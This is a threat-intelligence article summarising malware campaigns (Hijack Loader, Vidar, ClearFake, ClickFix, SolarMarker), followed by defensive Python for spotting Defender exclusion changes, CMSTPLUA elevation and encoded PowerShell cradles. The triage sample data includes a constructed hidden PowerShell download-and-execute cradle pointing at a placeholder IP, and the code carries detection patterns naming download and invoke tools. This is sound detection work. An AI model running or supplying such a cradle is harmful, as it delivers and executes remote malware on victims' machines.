Threat actors are using free software as bait to distribute malware, targeting unsuspecting users with pirated versions of popular software [1].

Description

The lure installs the Hijack Loader malware, which in turn drops the Vidar Stealer information stealer [1]. The campaign relies on DLL side-loading to launch Hijack Loader covertly [1] [2], and Hijack Loader then deploys Vidar Stealer through an AutoIt script [1] [2]. The malware bypasses User Account Control (UAC) by abusing the CMSTPLUA COM interface for privilege escalation [2] [3], and then adds itself to the Windows Defender exclusion list for defense evasion [2] [3]. Besides stealing credentials from web browsers [1], the attack chain also installs a bitcoin miner on compromised hosts.

ClearFake campaigns trick site visitors into running a PowerShell script [1], which delivers Lumma Stealer, Amadey Loader, the XMRig miner and clipper malware [1] [2].

TA571 malspam campaigns use HTML attachments to spread Vidar Stealer [1] [2], while a separate activity cluster tracked as ClickFix relies on fake browser update lures [1]. Victims are shown a Base64-encoded PowerShell command which, once run, installs either Matanbuchus or DarkGate [1].

eSentire has also uncovered a malware operation that impersonates Indeed.com to distribute the SolarMarker information stealer through SEO poisoning [1].
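Two of the post-exploitation steps in the Hijack Loader chain above (the Defender exclusion change and the CMSTPLUA elevation) leave distinct traces that a detection engineer can key on. The following Python is an added example, not code from the cited reports: it parses constructed messages in the shape of Microsoft Defender Event ID 5007 ("Configuration has changed") to pull out exclusion additions and removals, flags additions that fall outside a baseline or point at user-writable locations, and recognises a process whose parent is the COM surrogate (dllhost.exe) hosting the CMSTPLUA CLSID. The sample events, the paths and the baseline list are constructed for this example.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample messages in the shape of Microsoft Defender Antivirus
# Event ID 5007 ("Configuration has changed", log Microsoft-Windows-Windows
# Defender/Operational). The Old value / New value layout mirrors the real
# event; the paths themselves are invented for this example.
_HDR = ("Microsoft Defender Antivirus Configuration has changed. If this is an "
        "unexpected event you should review the settings as this may be the "
        "result of malware.\r\n")
_EXCL = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\"
SAMPLE_5007 = [
    # an operator adding a path exclusion under a change ticket
    _HDR + "\tOld value: \r\n\tNew value: " + _EXCL + "Paths\\C:\\Program Files\\BackupAgent = 0x0",
    # a loader excluding its own drop directory
    _HDR + "\tOld value: \r\n\tNew value: " + _EXCL + "Paths\\C:\\Users\\Public\\Libraries\\update = 0x0",
    # an exclusion being removed (Old value populated, New value empty)
    _HDR + "\tOld value: " + _EXCL + "Processes\\C:\\Windows\\Temp\\svc.exe = 0x0\r\n\tNew value: ",
    # an unrelated setting change, which must not be reported as an exclusion
    _HDR + "\tOld value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection\\"
    "DisableRealtimeMonitoring = 0x0\r\n\tNew value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\"
    "Real-Time Protection\\DisableRealtimeMonitoring = 0x1",
]

# Matches the registry value text Defender writes for each exclusion type.
EXCLUSION_RE = re.compile(
    r"HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\"
    r"(?P<kind>Paths|Processes|Extensions|IpAddresses|TemporaryPaths)\\"
    r"(?P<value>.+?)\s*=\s*0x[0-9A-Fa-f]+"
)

# Hypothetical baseline: exclusions your change process has approved.
TRUSTED_EXCLUSION_PREFIXES: Tuple[str, ...] = ("C:\\Program Files\\BackupAgent",)
# Locations an unprivileged user (or a loader running as one) can write to.
USER_WRITABLE = ("c:\\users\\public", "\\appdata\\", "c:\\windows\\temp",
                 "c:\\programdata", "\\temp\\")

# CLSID of the CMSTPLUA COM elevation object; an elevated child spawned via it
# has dllhost.exe /Processid:{this CLSID} as its parent.
CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"


def _field(message: str, name: str) -> str:
    """Return the text after 'name:' on the line that carries it, else ''."""
    for line in message.splitlines():
        line = line.strip()
        if line.startswith(name + ":"):
            return line[len(name) + 1:].strip()
    return ""


def parse_exclusion_change(message: str) -> Optional[Dict[str, str]]:
    """Describe the exclusion touched by a 5007 event, or None if it touched none.

    An addition carries the exclusion in New value; a removal carries it in
    Old value with New value empty.
    """
    old, new = _field(message, "Old value"), _field(message, "New value")
    m = EXCLUSION_RE.search(new)
    if m:
        return {"kind": m["kind"], "value": m["value"], "action": "added"}
    m = EXCLUSION_RE.search(old)
    if m:
        return {"kind": m["kind"], "value": m["value"], "action": "removed"}
    return None


def review_exclusions(messages: List[str],
                      baseline: Tuple[str, ...] = TRUSTED_EXCLUSION_PREFIXES
                      ) -> List[Tuple[str, str, str]]:
    """Return (kind, value, reason) for every added exclusion not in the baseline."""
    findings = []
    for msg in messages:
        change = parse_exclusion_change(msg)
        if not change or change["action"] != "added":
            continue
        value = change["value"]
        if any(value.lower().startswith(p.lower()) for p in baseline):
            continue
        reason = "outside approved baseline"
        if any(tok in value.lower() for tok in USER_WRITABLE):
            reason = "user-writable location excluded"
        findings.append((change["kind"], value, reason))
    return findings


def is_cmstplua_elevation(parent_image: str, parent_cmdline: str,
                          child_integrity: str) -> bool:
    """True when a high-integrity child was spawned by the CMSTPLUA COM surrogate."""
    return (parent_image.lower().endswith("\\dllhost.exe")
            and CMSTPLUA_CLSID.lower() in parent_cmdline.lower()
            and child_integrity.lower() in ("high", "system"))


if __name__ == "__main__":
    for kind, value, reason in review_exclusions(SAMPLE_5007):
        print(f"[exclusion] {kind}: {value} ({reason})")
```

Event 5007 fires for every Defender setting change, so the useful signal is the Exclusions key inside the message rather than the event ID alone, and removals are worth keeping too because an attacker cleaning up looks the same as an operator tidying. Installers and some management tools also elevate through CMSTPLUA, so treat the parent match as a lead to correlate with the child image and its signer, not as a verdict.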
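The ClearFake and ClickFix lures above both end the same way: the victim runs a PowerShell one-liner, in the ClickFix case handed over as a Base64-encoded command. PowerShell's -EncodedCommand argument is Base64 over UTF-16LE text, so the payload is recoverable from the process command line that Sysmon Event ID 1 or Security Event 4688 records. The following Python is an added example, not code from the sources: it decodes the encoded argument from constructed command lines and flags the download-and-execute cradle shape. The URL (a documentation-range IP), paths and scripts are invented for the example; the encoder helper only exists to build those samples.

```python
import base64
import re
from typing import Dict, List, Optional


def _encode_ps(script: str) -> str:
    """Encode a script as PowerShell expects for -EncodedCommand (UTF-16LE, Base64).

    Used here only to build the constructed samples below.
    """
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process command lines. The IP is from the 198.51.100.0/24
# documentation range and the paths are invented.
SAMPLE_CMDLINES: List[str] = [
    # a ClickFix-style lure pasted into the Run dialog
    "powershell.exe -w hidden -nop -ep bypass -enc "
    + _encode_ps("$u='http://198.51.100.23/fix.txt';iex (iwr $u -UseBasicParsing).Content"),
    # a routine admin task that also happens to be encoded
    "powershell.exe -NoProfile -EncodedCommand "
    + _encode_ps("Get-Service -Name Spooler | Restart-Service"),
    # plain script invocation, nothing encoded
    "powershell.exe -File C:\\Scripts\\inventory.ps1",
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -en, -enc, ...). -ep / -ex belong to -ExecutionPolicy and must not match.
ENC_FLAG_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en\w*)\s+([A-Za-z0-9+/=]+)")
HIDDEN_RE = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b")
DOWNLOAD_RE = re.compile(
    r"(?i)\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|"
    r"start-bitstransfer|curl|wget)\b")
INVOKE_RE = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if absent or malformed."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # not valid Base64 / not UTF-16LE: leave it for a human rather than guess
        return None


def triage_cmdline(cmdline: str) -> Dict[str, object]:
    """Decode the command line if encoded and flag the download-and-execute cradle."""
    script = decode_encoded_command(cmdline)
    body = script if script is not None else cmdline
    indicators = []
    if HIDDEN_RE.search(cmdline):
        indicators.append("hidden-window")
    if DOWNLOAD_RE.search(body):
        indicators.append("download")
    if INVOKE_RE.search(body):
        indicators.append("invoke-expression")
    return {
        "encoded": script is not None,
        "script": script,
        "indicators": indicators,
        # the cradle: fetch something remote and evaluate it in the same line
        "suspicious": "download" in indicators and "invoke-expression" in indicators,
    }


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = triage_cmdline(line)
        print(result["suspicious"], result["indicators"], result["script"])
```

Encoding by itself is not a verdict, as the second sample shows; the signal is the decoded content, which is why the triage decodes first and matches second. Keep the decoded script in the alert so the analyst sees the URL without re-running the decode, and remember that the same paste-and-run trick reaches the host through cmd.exe and mshta.exe as well, which this example does not cover.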

Conclusion

These campaigns underline the need for vigilance and layered defenses against malware. Organizations and individuals should be cautious when downloading free software, should never paste a command offered by a web page into a Run dialog or terminal, should monitor for unexpected changes to antivirus exclusions, and should keep their security software up to date against evolving threats.

References

[1] https://rhyno.io/blogs/cybersecurity-awareness-training/cybercriminals-use-free-software-to-deploy-malware/
[2] https://thehackernews.com/2024/06/cybercriminals-exploit-free-software.html
[3] https://patabook.com/technology/2024/06/18/cybercriminals-exploit-free-software-lures-to-deploy-hijack-loader-and-vidar-stealer/